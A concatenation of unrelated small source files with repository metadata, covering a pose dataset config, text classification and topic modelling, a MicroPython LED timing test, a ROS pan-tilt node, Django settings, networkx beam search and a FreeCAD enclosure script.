dict(
type='Collect',
keys=['img'],
meta_keys=[
'image_file', 'center', 'scale', 'rotation', 'bbox_score',
'flip_pairs'
]),
]
test_pipeline = val_pipeline
data_root = 'data/horse10'
data = dict(
samples_per_gpu=64,
workers_per_gpu=2,
val_dataloader=dict(samples_per_gpu=256),
test_dataloader=dict(samples_per_gpu=256),
train=dict(
type='AnimalHorse10Dataset',
ann_file=f'{data_root}/annotations/horse10-train-split2.json',
img_prefix=f'{data_root}/',
data_cfg=data_cfg,
pipeline=train_pipeline),
val=dict(
type='AnimalHorse10Dataset',
ann_file=f'{data_root}/annotations/horse10-test-split2.json',
img_prefix=f'{data_root}/',
data_cfg=data_cfg,
pipeline=val_pipeline),
test=dict(
type='AnimalHorse10Dataset',
ann_file=f'{data_root}/annotations/horse10-test-split2.json',
img_prefix=f'{data_root}/',
data_cfg=data_cfg,
pipeline=val_pipeline),
)
|
[
"yhyuan@pku.edu.cn"
] |
yhyuan@pku.edu.cn
|
2e0211444ca61afc307df3356ddf5852e08e9341
|
62c9415d11605c6b4b5fb5b527138a3c693f4cd4
|
/code.py
|
d9e5d76da570fe49be9e7d79b1e346c7fe24f4ca
|
[
"MIT"
] |
permissive
|
Azharuddin14/domain-classification-text
|
30e212186f79a47d390fd7eedbda6e052ed27895
|
7cac3f8031781439f3e749f12ec0fd041ba4704a
|
refs/heads/master
| 2022-12-07T18:03:56.990663
| 2020-09-07T06:50:45
| 2020-09-07T06:50:45
| 293,445,735
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,065
|
py
|
# --------------
import pandas as pd
import os
import numpy as np
import warnings
warnings.filterwarnings("ignore")
# path_train : location of test file
# Code starts here
#Loading data
df = pd.read_csv(path_train)
print(df.head())
#Function to create new column
def label_race (row):
if row['food'] == "T":
return 'food'
elif row['recharge'] == "T":
return 'recharge'
elif row['support'] == "T":
return 'support'
elif row['reminders'] == "T":
return 'reminders'
elif row['travel'] == "T":
return 'travel'
elif row['nearby'] == "T":
return 'nearby'
elif row['movies'] == "T":
return 'movies'
elif row['casual'] == "T":
return 'casual'
else:
return "other"
# Creating a new column called category which has the column marked as true for that particular message.
df["category"] = df.apply (lambda row: label_race (row),axis=1)
# Dropping all other columns except the category column
drop_col= ["food", "recharge", "support", "reminders", "nearby", "movies", "casual", "other", "travel"]
df = df.drop(drop_col,1)
print("\nUpdated dataframe:\n",df.head())
#Code ends here
# --------------
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.preprocessing import LabelEncoder
# Sampling only 1000 samples of each category
df = df.groupby('category').apply(lambda x: x.sample(n=1000, random_state=0))
# Code starts here
all_text = df["message"].str.lower()
tfidf = TfidfVectorizer(stop_words="english")
vector_tfidf = tfidf.fit_transform(all_text)
X = vector_tfidf.toarray()
le = LabelEncoder()
y= le.fit_transform(df['category'])
# --------------
from sklearn.metrics import accuracy_score, classification_report
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import LogisticRegression
from sklearn.svm import LinearSVC
# Code starts here
X_train,X_val,y_train,y_val = train_test_split(X,y,test_size=0.3, random_state=42)
log_reg = LogisticRegression(random_state=0)
log_reg.fit(X_train,y_train)
y_pred = log_reg.predict(X_val)
log_accuracy = log_reg.score(X_val, y_val)
print(log_accuracy)
nb = MultinomialNB()
nb.fit(X_train,y_train)
y_pred = nb.predict(X_val)
nb_accuracy = nb.score(X_val, y_val)
print(nb_accuracy)
lsvm = LinearSVC(random_state=0)
lsvm.fit(X_train,y_train)
y_pred = lsvm.predict(X_val)
lsvm_accuracy = score = lsvm.score(X_val, y_val)
print(lsvm_accuracy)
# --------------
# path_test : Location of test data
#Loading the dataframe
df_test = pd.read_csv(path_test)
#Creating the new column category
df_test["category"] = df_test.apply (lambda row: label_race (row),axis=1)
#Dropping the other columns
drop= ["food", "recharge", "support", "reminders", "nearby", "movies", "casual", "other", "travel"]
df_test= df_test.drop(drop,1)
# Code starts here
all_text = df_test["message"].str.lower()
# Transforming using the tfidf object - tfidf
X_test = tfidf.transform(all_text).toarray()
# Transforming using label encoder object - le
y_test = le.transform(df_test["category"])
# Predicting using the logistic regression model - logreg
y_pred = log_reg.predict(X_test)
log_accuracy_2 = accuracy_score(y_test,y_pred)
print (str(log_accuracy_2)+(" is the accuracy of the logistic regression model"))
# Predicting using the naive bayes model - nb
y_pred = nb.predict(X_test)
nb_accuracy_2 = accuracy_score(y_test,y_pred)
print (str(nb_accuracy_2)+(" is the accuracy of the Naive Bayes model"))
# Predicting using the linear svm model - lsvm
y_pred = lsvm.predict(X_test)
lsvm_accuracy_2 = accuracy_score(y_test,y_pred)
print (str(lsvm_accuracy_2)+(" is the accuracy of the Support Vector model"))
# --------------
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
import string
import gensim
from gensim.models.lsimodel import LsiModel
from gensim import corpora
from pprint import pprint
# import nltk
# nltk.download('wordnet')
# Creating a stopwords list
stop = set(stopwords.words('english'))
exclude = set(string.punctuation)
lemma = WordNetLemmatizer()
# Function to lemmatize and remove the stopwords
def clean(doc):
stop_free = " ".join([i for i in doc.lower().split() if i not in stop])
punc_free = "".join(ch for ch in stop_free if ch not in exclude)
normalized = " ".join(lemma.lemmatize(word) for word in punc_free.split())
return normalized
# Creating a list of documents from the complaints column
list_of_docs = df["message"].tolist()
# Implementing the function for all the complaints of list_of_docs
doc_clean = [clean(doc).split() for doc in list_of_docs]
# Code starts here
dictionary = corpora.Dictionary(doc_clean)
doc_term_matrix = [dictionary.doc2bow(doc) for doc in doc_clean]
lsimodel = LsiModel(corpus=doc_term_matrix, num_topics=5, id2word=dictionary)
# --------------
from gensim.models import LdaModel
from gensim.models import CoherenceModel
# doc_term_matrix - Word matrix created in the last task
# dictionary - Dictionary created in the last task
# Function to calculate coherence values
def compute_coherence_values(dictionary, corpus, texts, limit, start=2, step=3):
"""
Compute c_v coherence for various number of topics
Parameters:
----------
dictionary : Gensim dictionary
corpus : Gensim corpus
texts : List of input texts
limit : Max num of topics
Returns:
-------
topic_list : No. of topics chosen
coherence_values : Coherence values corresponding to the LDA model with respective number of topics
"""
coherence_values = []
topic_list = []
for num_topics in range(start, limit, step):
model = gensim.models.ldamodel.LdaModel(doc_term_matrix, random_state = 0, num_topics=num_topics, id2word = dictionary, iterations=10)
topic_list.append(num_topics)
coherencemodel = CoherenceModel(model=model, texts=texts, dictionary=dictionary, coherence='c_v')
coherence_values.append(coherencemodel.get_coherence())
return topic_list, coherence_values
# Code starts here
# Calling the function
topic_list, coherence_value_list = compute_coherence_values(dictionary=dictionary, corpus=doc_term_matrix, texts=doc_clean, start=1, limit=41, step=5)
print(coherence_value_list)
# Finding the index associated with maximum coherence value
max_index=coherence_value_list.index(max(coherence_value_list))
# Finding the optimum no. of topics associated with the maximum coherence value
opt_topic= topic_list[max_index]
print("Optimum no. of topics:", opt_topic)
# Implementing LDA with the optimum no. of topic
lda_model = LdaModel(corpus=doc_term_matrix, num_topics=opt_topic, id2word = dictionary, iterations=10, passes = 30,random_state=0)
# pprint(lda_model.print_topics(5))
lda_model.print_topic(1)
|
[
"Azharuddin14@users.noreply.github.com"
] |
Azharuddin14@users.noreply.github.com
|
f92ed0c62fdc28da985503e7660f91196db17a1b
|
5fa0d9913d02e3712c60614a581c4d979b92d6f4
|
/esp32_wroom/fastLED/fastLED_7.py
|
d4ab1adae33ddad5914bdda57eb8139a0c57abab
|
[] |
no_license
|
bvhest/IoT-01_Playground
|
865c15b8221c717761a07c34944231c70cf4990c
|
8ef29f577f90e97af740ad0a7040948e8d617050
|
refs/heads/master
| 2020-05-19T21:48:38.689177
| 2019-06-25T20:12:12
| 2019-06-25T20:12:12
| 185,233,822
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 929
|
py
|
import machine, time, stm
# (blue) on-board LED:
led = machine.Pin(2, machine.Pin.OUT)
N = 100000
# LED direct aan en uit zetten obv functie
# mét voorgeladen functie-aanroepen
# én 'uitgeschreven' loop
# én compiler directive om native machine code te genereren.
@micropython.native
def blink_preload_unrolled8_native(n):
n //= 10
aan = led.on
uit = led.off
r = range(n)
for i in r:
aan()
uit()
aan()
uit()
aan()
uit()
aan()
uit()
aan()
uit()
aan()
uit()
aan()
uit()
aan()
uit()
aan()
uit()
def timer(f, n):
t0 = time.ticks_us()
f(n)
t1 = time.ticks_us()
dt = time.ticks_diff(t1, t0)
fmt = "{:5.3f} s, {:6.3f} uSec/blink : {:8.2f} kHz/s"
print(fmt.format(dt * 1e-6, dt/N, N/dt * 1e3))
timer(blink_preload_unrolled8_native, N)
|
[
"hestbv@gmail.com"
] |
hestbv@gmail.com
|
c269d84d1b1f238b273350a6705d59ed13399793
|
ae2812cd2824383705c3132e10db37ab453d0ce9
|
/src/agazebo/scripts/pan_and_tilt_turn.py
|
dfa6a935778a488caa7745ea406b89bf66ca7938
|
[] |
no_license
|
RBaldanzini/TiltRoboPan
|
fa978d0eb33677061b8f7159a1195dde91bfad2c
|
6df0bc415e5ff5f04aa540408dab88cb29553901
|
refs/heads/main
| 2023-05-28T03:30:43.874285
| 2021-06-18T21:47:45
| 2021-06-18T21:47:45
| 378,255,180
| 0
| 0
| null | 2021-06-18T21:47:45
| 2021-06-18T20:10:05
|
Python
|
UTF-8
|
Python
| false
| false
| 5,196
|
py
|
#!/usr/bin/python
import rospy
import math
import time
from std_msgs.msg import Float64
from geometry_msgs.msg import Point
from geometry_msgs.msg import Twist
from std_msgs.msg import Bool
r_wheel = 0.06
#
# def pan_and_tilt_search(self):
#
# """
# Topic Publisher
# """
# while not rospy.is_shutdown():
#
# rospy.loginfo("TRYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYy")
# for angle in range(-90, 90, 1):
# print("Moving Yaw=" + str(angle))
# yaw_in_radians = math.radians(angle)
# pan_angle_msg = Float64()
# pan_angle_msg.data = yaw_in_radians
# # Publish Joint Position
# self.pub_pan_position.publish(pan_angle_msg)
# time.sleep(0.1)
# # break
# break
class PanTilt:
def __init__(self):
self.sub_center = rospy.Subscriber("/line/point_line", Point, self.update_message)
rospy.init_node('is_line_following')
self.sub_bool = rospy.Subscriber("/button", Bool, self.update_bool)
self.pub_twist = rospy.Publisher("/cmd_vel", Twist, queue_size=20, latch=True)
self.pub_pan_position = rospy.Publisher(
'/pan_and_tilt/yaw_joint_position_controller/command',
Float64,
queue_size=1)
self.pub_tilt_position = rospy.Publisher(
'/pan_and_tilt/pitch_joint_position_controller/command',
Float64,
queue_size=1)
self.center_x = 0.0
self.center_y = 0.0
self.center_z = 0.0
self._bool = Bool()
self._message = Twist()
def update_message(self, message):
# self.lost_line = time.time()
#print(self.lost_line)
self.center_x = message.x
self.center_y = message.y
self.center_z = message.z
rospy.loginfo("Centres detected: %.1f %.1f %.1f" % (self.center_x, self.center_y, self.center_z))
return self.center_x, self.center_y, self.center_z
# @property
def update_bool(self, mgs):
# self.lost_line = time.time()
self._bool = mgs
# print(self._bool)
return self._bool
def pan_and_tilt_move(self):
"""
Topic Publisher
"""
while not rospy.is_shutdown():
rospy.loginfo("NNNNOOOOOOOOOOOOOOO")
while self._bool.data is False:
print("bbbbbbbbbb")
for angle in range(10, 90, 1):
print("Moving Yaw=" + str(angle))
yaw_in_radians = math.radians(angle)
pan_angle_msg = Float64()
pan_angle_msg.data = yaw_in_radians
# Publish Joint Position
self.pub_pan_position.publish(pan_angle_msg)
time.sleep(0.1)
if self.center_x:
# break
self.pub_pan_position.publish(0)
steer_action = -0.1
print("aaaaaaaaaaa")
self._message.angular.z = steer_action
rospy.loginfo("cmd_vel==" + str(self._message))
self.pub_twist.publish(self._message)
# angle_r = angle * math.radians(angle)
turn_time = 10 * ((2 * r_wheel) * (math.sin(math.radians(angle))) / steer_action * -1)
print(turn_time)
time.sleep(turn_time)
# if -30 < self.center_z < 30:
steer_action = 0.0
self._message.angular.z = steer_action
self.pub_twist.publish(self._message)
# break
# break
while self._bool.data is True:
print("cccccc")
# if not self._bool:
# print("gggggggg")
# pass
# for angle in range(90, -90, -1):
# print("Moving Yaw=" + str(angle))
# yaw_in_radians = math.radians(angle)
# pan_angle_msg = Float64()
# pan_angle_msg.data = yaw_in_radians
# # Publish Joint Position
# self.pub_pan_position.publish(pan_angle_msg)
# time.sleep(0.15)
# print(self.center_z)
# if not self.center_z:
# steer_action = -0.2
# throttle_action = 0.1
# print("aaaaaaaaaaa")
# self._message.linear.x = throttle_action
# self._message.angular.z = steer_action
# # rospy.loginfo("cmd_vel==" + str(self._message))
# self.pub_twist.publish(self._message)
# break
# break
if __name__ == "__main__":
# while not rospy.is_shutdown():
# rospy.Rate(10)
# rospy.spin()
pan_tilt = PanTilt()
pan_tilt.pan_and_tilt_move()
try:
rospy.spin()
rospy.Rate(10)
except KeyboardInterrupt:
print("Shutting down")
|
[
"baldanzinirenato@gmail.com"
] |
baldanzinirenato@gmail.com
|
7f60cafb6d78687117fb140a44791d72b45d5b8a
|
d2b51467e5dcfe9eeabbf2aa6c450baa0301ca9d
|
/usertracking/urls.py
|
89dd70e5bf02c856af9de3b8ca0e51456a6f3bc9
|
[] |
no_license
|
humbhenri/usertracking_django
|
bc95ddbb52cd60c5949c623c7858876d338b0237
|
e883955dcc4594a6e02b98cc834a411db4770f7d
|
refs/heads/master
| 2021-01-23T07:03:31.989728
| 2014-12-23T01:15:39
| 2014-12-23T01:15:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 329
|
py
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'usertracking.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^userapp/', include('userapp.urls')),
)
|
[
"humbhenri@gmail.com"
] |
humbhenri@gmail.com
|
fcb36c510c8b2b34d0e1b7a9bd455d161fdc4d7d
|
51f68500c156042b8dc900e5e574cb0ae03bafd8
|
/jaso_hello.py
|
4a73260a273746b2ad0d58178d3fd3854b5951bf
|
[] |
no_license
|
JSoyinka/GithubAzureGuide
|
4e4ae9b9c19d1928621dbabe85148f2750020069
|
c7604f02841e5ac7a2de46bce0c93e231a97f8a3
|
refs/heads/master
| 2021-06-20T18:27:34.281723
| 2019-08-16T23:51:18
| 2019-08-16T23:51:18
| 194,110,847
| 0
| 1
| null | 2021-06-10T23:36:38
| 2019-06-27T14:30:55
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 278
|
py
|
import matplotlib.pyplot as plt
import numpy as np
x = np.linspace(0, 20, 100) # Create a list of evenly-spaced numbers over the range
plt.plot(x, np.sin(x)) # Plot the sine of each x point
plt.show() # Display the plot
msg = "Hello world"
print(msg)
|
[
"t-jaso@microsoft.com"
] |
t-jaso@microsoft.com
|
05d4acaf0415301b70a2b2281ba345868861f33c
|
632dcb4e37cadd87cb7ff8715b0048df5cd0d11b
|
/CompuCell3D/core/Demos/BookChapterDemos_ComputationalMethodsInCellBiology/cellsorting/Simulation/cellsortingSteppables.py
|
1552917cd841bd0d99c7773c8f864b12590c4435
|
[
"MIT"
] |
permissive
|
CompuCell3D/CompuCell3D
|
df638e3bdc96f84b273978fb479842d071de4a83
|
65a65eaa693a6d2b3aab303f9b41e71819f4eed4
|
refs/heads/master
| 2023-08-26T05:22:52.183485
| 2023-08-19T17:13:19
| 2023-08-19T17:13:19
| 12,253,945
| 51
| 41
| null | 2023-08-27T16:36:14
| 2013-08-20T20:53:07
|
C++
|
UTF-8
|
Python
| false
| false
| 524
|
py
|
from cc3d.core.PySteppables import *
class CellSortingSteppable(SteppableBasePy):
def __init__(self, frequency=10):
SteppableBasePy.__init__(self, frequency)
def start(self):
# any code in the start function runs before MCS=0
pass
def step(self, mcs):
# type here the code that will run every _frequency MCS
for cell in self.cellList:
print("cell.id=", cell.id)
def finish(self):
# Finish Function gets called after the last MCS
pass
|
[
"maciekswat@gmail.com"
] |
maciekswat@gmail.com
|
b70c06650c879742828e6579365f7880481ebc1d
|
71892c14e8029130056b7cb33c4d5edba85c4ba7
|
/2019/2/part2.py
|
05f63f2b33f900ad61f79dd5384599629eebc8bd
|
[] |
no_license
|
Clearyoi/adventofcode
|
960902d1c1a7ee4894b64273dc7d27a35d3461f6
|
0959f66df0cdfbcd31498ff4ac036298aa63b332
|
refs/heads/master
| 2021-07-12T01:41:32.188061
| 2020-12-14T13:04:14
| 2020-12-14T13:04:14
| 225,496,204
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 482
|
py
|
import sys
def run_comp(noun, verb):
mem = [int(x) for x in open("input.txt").read().strip().split(',')]
mem[1] = noun
mem[2] = verb
i = 0
while mem[i]:
if mem[i] == 99:
return mem[0]
elif mem[i] == 1:
mem[mem[i+3]] = mem[mem[i+1]] + mem[mem[i+2]]
elif mem[i] == 2:
mem[mem[i+3]] = mem[mem[i+1]] * mem[mem[i+2]]
else:
return -1
i = i + 4
for i in range(0, 99):
for j in range(0, 99):
if run_comp(i, j) == 19690720:
print 100 * i + j
sys.exit()
|
[
"clearyoi@tcd.ie"
] |
clearyoi@tcd.ie
|
f96566b7f51d80a388074bf74e5f9a0d52dfe150
|
3d25b307a56f9cb437a81615e3bd0e6fde195005
|
/app/app/settings.py
|
237c13baad0f8f0fd4bb00437c53dcfd0d3d0e28
|
[
"MIT"
] |
permissive
|
abu271/drf_recipe
|
ae6c9a115f4da23dd2e01573d2af73f5e5e109d5
|
4902572e59ecc8c7de1e58e263213ba2e4c996bd
|
refs/heads/master
| 2023-02-28T13:02:10.291428
| 2021-02-04T00:18:51
| 2021-02-04T00:18:51
| 287,782,841
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,479
|
py
|
"""
Django settings for app project.
Generated by 'django-admin startproject' using Django 3.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3)0s%n4a39-$ks*u!v)u=!3ik9ll5++u)*-yc6mu(32@3t33_j'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'core',
'user',
'recipe'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'HOST': os.environ.get('DB_HOST'),
'NAME': os.environ.get('DB_NAME'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASSWORD'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
STATIC_ROOT = '/vol/web/static'
MEDIA_ROOT = '/vol/web/media'
# Override default django user model with core user model
AUTH_USER_MODEL = 'core.User'
|
[
"abudarda166@gmail.com"
] |
abudarda166@gmail.com
|
23dccdc3c63a1b7f21c7f9809367669ea45dd9b7
|
51c5c7c9250d8bff33d3b775c29fe2ec2e653438
|
/GameTickTack.py
|
c392bfa933537cf8ae0777c430e0aab625c2842a
|
[] |
no_license
|
rohitbansal83/Python3
|
cbfe8f987d2b6f27a788fffdf0be5a6c865c4110
|
002cf74d176c9a410803dfd58f24f4e8eeb9d6ac
|
refs/heads/master
| 2020-03-19T09:01:23.017858
| 2018-06-06T02:03:42
| 2018-06-06T02:03:42
| 136,253,887
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,241
|
py
|
def selectplayer():
symbol = input("Please Select X or O for Player 1: ")
global d
if (symbol =='X' ):
d = {'X':'P1','O':'P2','P1':'X','P2':'O'}
else:
d = {'X':'P2','O':'P1','P1':'O','P2':'X'}
def isgamewon():
global b
global d
for x in range(3):
if b[0][x] == b[1][x] == b[2][x] and b[0][x]!='E':
return d[b[0][x]]
if b[x][0] == b[x][1] == b[x][2] and b[x][0] !='E':
return d[b[x][0]]
if b[1][1]!='E' and (b[0][0] == b[1][1] == b[2][2] or b[0][2] == b[1][1] == b[2][0]):
return d[b[1][1]]
return 'N'
def isgamedrawn():
global b
for x in range(3):
l = b[:][x]
if l.count('X') == 0 or l.count('O') == 0:
return False
l = b[x][:]
if l.count('X') == 0 or l.count('O') == 0:
return False
l= [b[0][0],b[1][1],b[2][2]]
if l.count('X') == 0 or l.count('O') == 0:
return False
l= [b[0][2],b[1][1],b[2][0]]
if l.count('X') == 0 or l.count('O') == 0:
return False
return True
def getinputp1():
row= input("(Player 1) Select the row for next move: ")
col= input("(Player 1) Select the col for next move: ")
putinput (d['P1'],row,col)
def getinputp2():
row= input("(Player 2) Select the row for next move: ")
col= input("(Player 2) Select the col for next move: ")
putinput (d['P2'],row,col)
def putinput(move,row,col):
global b
b[int(row)-1][int(col)-1] = move
print (b[0])
print (b[1])
print (b[2])
def game():
global b
drawboard()
selectplayer()
winner = isgamewon()
while winner == 'N' and isgamedrawn()==False:
getinputp1()
winner = isgamewon()
if winner!='N':
print ("Congratulation Player "+ winner +". You have won!")
print(b[0])
print(b[1])
print(b[2])
break
elif isgamedrawn():
print ("Game Drawn!")
break
getinputp2()
winner = isgamewon()
if winner!='N':
print ("Congratulation Player "+ winner +". You have won!")
break
elif isgamedrawn():
print ("Game Drawn!")
break
def playmore():
global gamecount
gamecount = input("do you want to playmore: ")
if gamecount == 'Y' or gamecount =='y':
return True
else:
return False
def gameset():
game()
while playmore():
game()
else:
print ("Game Over!")
b = [['E','E','E'],['E','E','E'],['E','E','E']]
d = {}
gamecount ='Y'
gameset()
|
[
"rohitbansal83@gmail.com"
] |
rohitbansal83@gmail.com
|
abbfffaaa576afa02143457a207b4667225aa4ac
|
066e503dec4934d6a528a3e80fbf842663af2b9f
|
/algorithms/shortest_paths/beam.py
|
d94911fa4e3614856753a04a0682b35aa337e034
|
[] |
no_license
|
rirolli/Homework
|
3559212d12f69be8541a0f169bc94de7f9156911
|
c021fcc617ada0a0cc461c9e6c317d9bd6afb1af
|
refs/heads/master
| 2021-05-26T04:05:23.120032
| 2020-04-10T21:24:33
| 2020-04-10T21:24:33
| 254,045,765
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,596
|
py
|
# beamsearch.py - breadth-first search with limited queueing
#
# Copyright 2016-2019 NetworkX developers.
#
# This file is part of NetworkX.
#
# NetworkX is distributed under a BSD license; see LICENSE.txt for more
# information.
"""Basic algorithms for breadth-first searching the nodes of a graph."""
import networkx as nx
# from .breadth_first_search import generic_bfs_edges
from networkx.algorithms.traversal.depth_first_search import dfs_edges
__all__ = ['dfs_beam_edges']
def dfs_beam_edges(G, source, value, width=None):
"""Iterates over edges in a beam search.
The beam search is a generalized breadth-first search in which only
the "best" *w* neighbors of the current node are enqueued, where *w*
is the beam width and "best" is an application-specific
heuristic. In general, a beam search with a small beam width might
not visit each node in the graph.
Parameters
----------
G : NetworkX graph
source : node
Starting node for the breadth-first search; this function
iterates over only those edges in the component reachable from
this node.
value : function
A function that takes a node of the graph as input and returns a
real number indicating how "good" it is. A higher value means it
is more likely to be visited sooner during the search. When
visiting a new node, only the `width` neighbors with the highest
`value` are enqueued (in decreasing order of `value`).
width : int (default = None)
The beam width for the search. This is the number of neighbors
(ordered by `value`) to enqueue when visiting each new node.
Yields
------
edge
Edges in the beam search starting from `source`, given as a pair
of nodes.
Examples
--------
To give nodes with, for example, a higher centrality precedence
during the search, set the `value` function to return the centrality
value of the node::
>>> G = nx.karate_club_graph()
>>> centrality = nx.eigenvector_centrality(G)
>>> source = 0
>>> width = 5
>>> for u, v in nx.bfs_beam_edges(G, source, centrality.get, width):
... print((u, v)) # doctest: +SKIP
"""
if width is None:
width = len(G)
def successors(v):
"""Returns a list of the best neighbors of a node.
`v` is a node in the graph `G`.
The "best" neighbors are chosen according to the `value`
function (higher is better). Only the `width` best neighbors of
`v` are returned.
The list returned by this function is in decreasing value as
measured by the `value` function.
"""
# TODO The Python documentation states that for small values, it
# is better to use `heapq.nlargest`. We should determine the
# threshold at which its better to use `heapq.nlargest()`
# instead of `sorted()[:]` and apply that optimization here.
#
# If `width` is greater than the number of neighbors of `v`, all
# neighbors are returned by the semantics of slicing in
# Python. This occurs in the special case that the user did not
# specify a `width`: in this case all neighbors are always
# returned, so this is just a (slower) implementation of
# `bfs_edges(G, source)` but with a sorted enqueue step.
return iter(sorted(G.neighbors(v), key=value, reverse=True)[:width])
# TODO In Python 3.3+, this should be `yield from ...`
for e in dfs_edges(G, source):
yield e
|
[
"riccardo.ung@outlook.it"
] |
riccardo.ung@outlook.it
|
425f7013d61631a6802b53c0435d6554e5d5152d
|
df620e718bfdf78497c9bddcbdcbc290dc6e13f1
|
/chassis/hptr_freecad.py
|
31291f44ad168b43e9a953ec554e9670270e31ae
|
[
"MIT"
] |
permissive
|
UAF-SuperDARN-OPS/SuperDARN_Transmitter
|
156ff3854f45304c68cfbcbcc4be9f1ba1cf9d58
|
9f84401ca4723f55f4b7568e4d191f6ffcef3c09
|
refs/heads/master
| 2018-12-20T18:32:08.228770
| 2018-09-18T17:49:37
| 2018-09-18T17:49:37
| 15,055,287
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,661
|
py
|
# python script to generate transmitter plate
# using freecad scripting
import sys
sys.path.append('/usr/lib/freecad')
from FreeCAD import Base
import Part
import pdb
XIDX = 0
YIDX = 1
ZIDX = 2
# units in inches..
#origin at lower left corner of plate
# / height
# |-----|
# | |width
# X-----|
# length
IN = 25.4
PCB_WIDTH = 2.65 * IN
PCB_LEN = 4.26 * IN
PCB_HEIGHT = (.45 + .062) * IN
STANDOFF_SIZE = .25 * IN
WALL_THICKNESS = (1./4) * IN
WALL_DIAMETER = .5 * IN
FLOOR_DIAMETER = WALL_DIAMETER / 2.
SIDE_CLEARANCE = WALL_DIAMETER
BACK_CLEARANCE = 2 * WALL_DIAMETER
TOP_CLEARANCE = .25 * IN
BOX_HEIGHT = PCB_HEIGHT + 2 * WALL_THICKNESS + TOP_CLEARANCE
BOX_LENGTH = 6 * IN
BOX_WIDTH = 3 * IN
# hole diameter for tapping, in inches
DRILL_6D32 = 0.10650 * IN # 6D32 for pcb mounting holes..
DRILL_4D40 = 0.08900 * IN # 4D40 for lid attachment
# mounting holes...
# mounting hole locations, offset from PCB edge
holes_6d32 = [ (1.125, 5.025), (1.125, 0.275), (5.475, 5.025), (5.475, 0.275)]
holes_4d40 = [ (1.125, 5.025), (1.125, 0.275), (5.475, 5.025), (5.475, 0.275)]
def drill_holes(plate, holes, drill):
for hole in holes:
hole_center = Base.Vector(hole[0] * IN, hole[1] * IN, 0)
hole_radius = drill / 2.
drill_hole = Part.makeCylinder(hole_radius, PLATE_HEIGHT, hole_center)
plate = plate.cut(drill_hole)
return plate
def main():
# create box base, extrude up
box = Part.makeBox(BOX_LENGTH + 2 * WALL_THICKNESS, BOX_WIDTH + 2 * WALL_THICKNESS, BOX_HEIGHT + 2 * WALL_THICKNESS)
box.translate(Base.Vector(-WALL_THICKNESS, -WALL_THICKNESS, - 2 * WALL_THICKNESS))
pocket = Part.makeBox(BOX_LENGTH, BOX_WIDTH, BOX_HEIGHT)
wall_edges = []
# fillet sides of pocket
for edge in pocket.Edges:
v1 = edge.Vertexes[0].Point
v2 = edge.Vertexes[1].Point
if v1[XIDX] == v2[XIDX] and v1[YIDX] == v2[YIDX]:
wall_edges.append(edge)
pocket = pocket.makeFillet(WALL_DIAMETER / 2., wall_edges)
# fillet floor of pocket
floor_edges = []
for edge in pocket.Edges:
v1 = edge.Vertexes[0].Point
v2 = edge.Vertexes[1].Point
if (v1[ZIDX] == 0) and (v2[ZIDX] == 0):
floor_edges.append(edge)
pocket = pocket.makeFillet(FLOOR_DIAMETER / 2., floor_edges)
box = box.cut(pocket)
# drill hptr mounting holes
#pocket = drill_holes(pocket, holes_6d32, DRILL_6D32)
# drill lid mounting holes
